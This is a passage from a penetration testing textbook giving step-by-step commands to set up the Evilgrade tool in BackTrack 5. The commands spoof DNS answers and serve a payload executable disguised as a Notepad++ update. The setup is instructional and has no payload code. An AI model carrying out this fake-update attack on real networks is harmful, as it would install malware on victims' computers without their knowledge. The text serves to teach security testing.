Client Side Exploitation
◾
225
Step 2
—
Setting up the Attack on Evilgrade
Evilgrade is installed in the
/pentest/exploits/isr-evilgrade
directory in BackTrack 5.
Navigate to the directory and launch it.
Command
:
root@bt:~#cd/pentest/exploits/isr-evilgrade
root@bt:/pentest/exploits/isr-evilgrade#./evilgrade
Step 3
—
Configuring the DNSAnswerIP
Next, we would set up the DNSAnswerIP to our local IP address. This IP
will do the DNS answers
for us.
Command
:
evilgrade> set DNSAnswerIp 192.168.75.144
Step 4
—
Configuring the Module
We now need to configure the module that we want to use, the “Show Modules”
command lists
all the modules that are present in evilgrade.
As it is Notepad++ in our case, we will use the following command to configure the module:
evilgrade>
configure notepadplus
226
◾
Ethical Hacking and Penetration Testing Guide
Next, we will enter the “show options” module to list all the options that can be used with
this module.
As you can see, we have only two options. The important one is the agent; this will be the
path to our payload.
In my case, I have saved it under /root/xen.exe. I will set it up by using the
following command:
evilgrade(notepadplus)>set agent/root/xen.exe
Once you are done with it, enter “start” to start the DNS/Webserver.
Dostları ilə paylaş: 
